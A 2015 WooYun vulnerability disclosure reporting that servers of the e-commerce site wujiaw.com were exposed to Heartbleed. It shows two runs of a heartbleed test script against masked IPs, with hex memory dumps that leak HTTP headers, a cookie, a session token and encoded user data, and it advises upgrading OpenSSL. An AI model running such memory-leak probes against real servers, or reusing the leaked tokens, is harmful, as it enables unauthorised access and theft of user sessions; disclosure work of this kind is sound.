漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0149301
漏洞标题:吾家网某服务配置不当导致用户信息泄露
相关厂商:北京利吾家电子商务有限公司
漏洞作者: 路人甲
提交时间:2015-10-26 18:16
修复时间:2015-12-14 17:10
公开时间:2015-12-14 17:10
漏洞类型:系统/服务运维配置不当
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开
简要描述:
吾家网某服务配置不当导致用户信息泄露
详细说明:
0x01:目标
共解析到三个IP上
0x02:heartbleed
抓取到用户名和密文
0x03:友情测试 到此结束
漏洞证明:
root@kali:~/Desktop/heartbleed# python ssltest.py **.**.**.**
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 5330
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 03 05 01 04 ....#...........
00e0: 03 04 01 03 03 03 01 02 03 02 01 02 02 01 01 00 ................
00f0: 00 00 13 00 11 00 00 0E 77 77 77 2E 77 75 6A 69 ........www.wuji
0100: 61 77 2E 63 6F 6D 41 6C 69 76 65 0D 0A 48 6F 73 **.**.**.**Alive..Hos
0110: 74 3A 20 77 77 77 2E 77 75 6A 69 61 77 2E 63 6F t: www.wujiaw.co
0120: 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 4D 6F m..User-Agent:Mo
0130: 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F zilla/5.0 (Windo
0140: 77 73 20 4E 54 20 36 2E 31 29 20 41 70 70 6C 65 ws NT 6.1) Apple
0150: 57 65 62 4B 69 74 2F 35 33 37 2E 31 20 28 4B 48 WebKit/537.1 (KH
0160: 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 TML, like Gecko)
0170: 20 43 68 72 6F 6D 65 2F 32 31 2E 30 2E 31 31 38 Chrome/21.0.118
0180: 30 2E 38 39 20 53 61 66 61 72 69 2F 35 33 37 2E 0.89 Safari/537.
0190: 31 3B 20 33 36 30 53 70 69 64 65 72 28 63 6F 6D 1; 360Spider(com
01a0: 70 61 74 69 62 6C 65 3B 20 48 61 6F 73 6F 75 53 patible; HaosouS
01b0: 70 69 64 65 72 3B 20 68 74 74 70 3A 2F 2F 77 77 pider; http://ww
01c0: 77 2E 68 61 6F 73 6F 75 2E 63 6F 6D 2F 68 65 6C **.**.**.**/hel
01d0: 70 2F 68 65 6C 70 5F 33 5F 32 2E 68 74 6D 6C 29 p/help_3_2.html)
01e0: 0D 0A 0D 0A 5B 96 FD D3 6C 75 1D B8 23 37 7C 31 ....[...lu..#7|1
01f0: F9 FD F3 43 87 6C E8 5C 07 07 07 07 07 07 07 07 ...C.l.\........
0200: A8 0B C3 8A A3 42 A0 6A 6C 4C AC F9 4D C8 64 9A .....B.jlL..M.d.
0210: 33 7C 34 D4 E4 EE 3A C6 84 1B 93 98 73 ED A3 C2 3|4...:.....s...
0220: 99 50 56 03 5F 68 74 6D 6C 3F 72 65 64 69 72 65 .PV._html?redire
0230: 63 74 55 72 6C 3D 68 74 74 70 73 3A 2F 2F 31 30 ctUrl=https://10
0240: 31 2E 32 35 31 2E 32 32 37 2E 36 31 2F 0D 0A 41 **.**.**.**/..A
0250: 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 ccept-Encoding:
0260: 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 2C 20 73 gzip, deflate, s
0270: 64 63 68 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 dch..Accept-Lang
0280: 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 uage: zh-CN,zh;q
0290: 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A 20 43 4E =0.8..Cookie: CN
02a0: 5A 5A 44 41 54 41 35 37 36 38 35 39 34 3D 63 6E ZZDATA5768594=cn
02b0: 7A 7A 5F 65 69 64 25 33 44 31 36 39 35 31 31 34 zz_eid%3D1695114
02c0: 37 39 39 2D 31 34 34 35 37 34 34 34 35 35 2D 25 799-1445744455-%
02d0: 32 36 6E 74 69 6D 65 25 33 44 31 34 34 35 37 34 26ntime%3D144574
02e0: 34 34 35 35 3B 20 74 6F 6B 65 6E 3D 37 61 64 37 4455; token=7ad7
02f0: 38 65 39 31 2D 34 32 61 36 2D 34 62 39 37 2D 39 8e91-42a6-4b97-9
0300: 39 34 65 2D 31 31 65 39 35 64 65 61 32 33 37 34 94e-11e95dea2374
0310: 0D 0A 0D 0A 44 CB 51 95 84 FA AD FD FD 17 51 B7 ....D.Q.......Q.
0320: 98 3B 6F B8 76 5A 64 79 59 49 33 4F 59 62 57 4D .;o.vZdyYI3OYbWM
0330: 4F 42 4D 51 46 31 46 73 49 49 53 6B 39 25 32 46 OBMQF1FsIISk9%2F
0340: 25 32 46 75 53 48 76 47 59 51 71 4D 61 73 64 71 %2FuSHvGYQqMasdq
0350: 6B 56 57 55 6D 57 79 57 4E 50 4B 66 59 25 32 46 kVWUmWyWNPKfY%2F
0360: 37 46 6A 36 55 75 56 25 32 42 66 7A 25 32 42 70 7Fj6UuV%2Bfz%2Bp
0370: 69 47 7A 52 38 48 67 25 32 46 72 50 71 52 46 69 iGzR8Hg%2FrPqRFi
0380: 4C 79 71 65 7A 63 42 51 47 6B 76 79 41 6C 25 32 LyqezcBQGkvyAl%2
0390: 42 6C 6A 31 37 62 46 4B 48 62 46 67 41 65 7A 64 Blj17bFKHbFgAezd
03a0: 6A 4A 4B 74 33 45 76 37 52 54 49 48 66 39 5A 70 jJKt3Ev7RTIHf9Zp
03b0: 36 4B 49 4A 31 54 56 64 32 33 6A 4B 41 6B 4D 25 6KIJ1TVd23jKAkM%
03c0: 32 42 59 55 25 33 44 0A CB 3D 8D FA 3A 38 31 4A 2BYU%3D..=..:81J
03d0: FB 7D 1A 64 8C 19 91 00 00 00 00 00 00 00 00 00 .}.d............
root@kali:~/Desktop/heartbleed# python ssltest.py 10**.**.**.**
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 5330
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 03 05 01 04 ....#...........
00e0: 03 04 01 03 03 03 01 02 03 02 01 02 02 01 01 00 ................
00f0: 00 00 13 00 11 00 00 0E 77 77 77 2E 77 75 6A 69 ........www.wuji
0100: 61 77 2E 63 6F 6D 41 6C 69 76 65 0D 0A 48 6F 73 **.**.**.**Alive..Hos
0110: 74 3A 20 77 77 77 2E 77 75 6A 69 61 77 2E 63 6F t: www.wujiaw.co
0120: 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 4D 6F m..User-Agent:Mo
0130: 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F zilla/5.0 (Windo
0140: 77 73 20 4E 54 20 36 2E 31 29 20 41 70 70 6C 65 ws NT 6.1) Apple
0150: 57 65 62 4B 69 74 2F 35 33 37 2E 31 20 28 4B 48 WebKit/537.1 (KH
0160: 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 TML, like Gecko)
0170: 20 43 68 72 6F 6D 65 2F 32 31 2E 30 2E 31 31 38 Chrome/21.0.118
0180: 30 2E 38 39 20 53 61 66 61 72 69 2F 35 33 37 2E 0.89 Safari/537.
0190: 31 3B 20 33 36 30 53 70 69 64 65 72 28 63 6F 6D 1; 360Spider(com
01a0: 70 61 74 69 62 6C 65 3B 20 48 61 6F 73 6F 75 53 patible; HaosouS
01b0: 70 69 64 65 72 3B 20 68 74 74 70 3A 2F 2F 77 77 pider; http://ww
01c0: 77 2E 68 61 6F 73 6F 75 2E 63 6F 6D 2F 68 65 6C **.**.**.**/hel
01d0: 70 2F 68 65 6C 70 5F 33 5F 32 2E 68 74 6D 6C 29 p/help_3_2.html)
01e0: 0D 0A 0D 0A 5B 96 FD D3 6C 75 1D B8 23 37 7C 31 ....[...lu..#7|1
01f0: F9 FD F3 43 87 6C E8 5C 07 07 07 07 07 07 07 07 ...C.l.\........
0200: A8 0B C3 8A A3 42 A0 6A 6C 4C AC F9 4D C8 64 9A .....B.jlL..M.d.
0210: 33 7C 34 D4 E4 EE 3A C6 84 1B 93 98 73 ED A3 C2 3|4...:.....s...
0220: 99 50 56 03 5F 68 74 6D 6C 3F 72 65 64 69 72 65 .PV._html?redire
0230: 63 74 55 72 6C 3D 68 74 74 70 73 3A 2F 2F 31 30 ctUrl=https://10
0240: 31 2E 32 35 31 2E 32 32 37 2E 36 31 2F 0D 0A 41 **.**.**.**/..A
0250: 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 ccept-Encoding:
0260: 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 2C 20 73 gzip, deflate, s
0270: 64 63 68 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 dch..Accept-Lang
0280: 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 uage: zh-CN,zh;q
0290: 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A 20 43 4E =0.8..Cookie: CN
02a0: 5A 5A 44 41 54 41 35 37 36 38 35 39 34 3D 63 6E ZZDATA5768594=cn
02b0: 7A 7A 5F 65 69 64 25 33 44 31 36 39 35 31 31 34 zz_eid%3D1695114
02c0: 37 39 39 2D 31 34 34 35 37 34 34 34 35 35 2D 25 799-1445744455-%
02d0: 32 36 6E 74 69 6D 65 25 33 44 31 34 34 35 37 34 26ntime%3D144574
02e0: 34 34 35 35 3B 20 74 6F 6B 65 6E 3D 37 61 64 37 4455; token=7ad7
02f0: 38 65 39 31 2D 34 32 61 36 2D 34 62 39 37 2D 39 8e91-42a6-4b97-9
0300: 39 34 65 2D 31 31 65 39 35 64 65 61 32 33 37 34 94e-11e95dea2374
0310: 0D 0A 0D 0A 44 CB 51 95 84 FA AD FD FD 17 51 B7 ....D.Q.......Q.
0320: 98 3B 6F B8 76 5A 64 79 59 49 33 4F 59 62 57 4D .;o.vZdyYI3OYbWM
0330: 4F 42 4D 51 46 31 46 73 49 49 53 6B 39 25 32 46 OBMQF1FsIISk9%2F
0340: 25 32 46 75 53 48 76 47 59 51 71 4D 61 73 64 71 %2FuSHvGYQqMasdq
0350: 6B 56 57 55 6D 57 79 57 4E 50 4B 66 59 25 32 46 kVWUmWyWNPKfY%2F
0360: 37 46 6A 36 55 75 56 25 32 42 66 7A 25 32 42 70 7Fj6UuV%2Bfz%2Bp
0370: 69 47 7A 52 38 48 67 25 32 46 72 50 71 52 46 69 iGzR8Hg%2FrPqRFi
0380: 4C 79 71 65 7A 63 42 51 47 6B 76 79 41 6C 25 32 LyqezcBQGkvyAl%2
0390: 42 6C 6A 31 37 62 46 4B 48 62 46 67 41 65 7A 64 Blj17bFKHbFgAezd
03a0: 6A 4A 4B 74 33 45 76 37 52 54 49 48 66 39 5A 70 jJKt3Ev7RTIHf9Zp
03b0: 36 4B 49 4A 31 54 56 64 32 33 6A 4B 41 6B 4D 25 6KIJ1TVd23jKAkM%
03c0: 32 42 59 55 25 33 44 0A CB 3D 8D FA 3A 38 31 4A 2BYU%3D..=..:81J
03d0: FB 7D 1A 64 8C 19 91 00 00 00 00 00 00 00 00 00 .}.d............
03e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
修复方案:
升级openssl
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-10-30 17:08
厂商回复:
暂未建立与网站管理单位的直接处置渠道,待认领。
最新状态:
暂无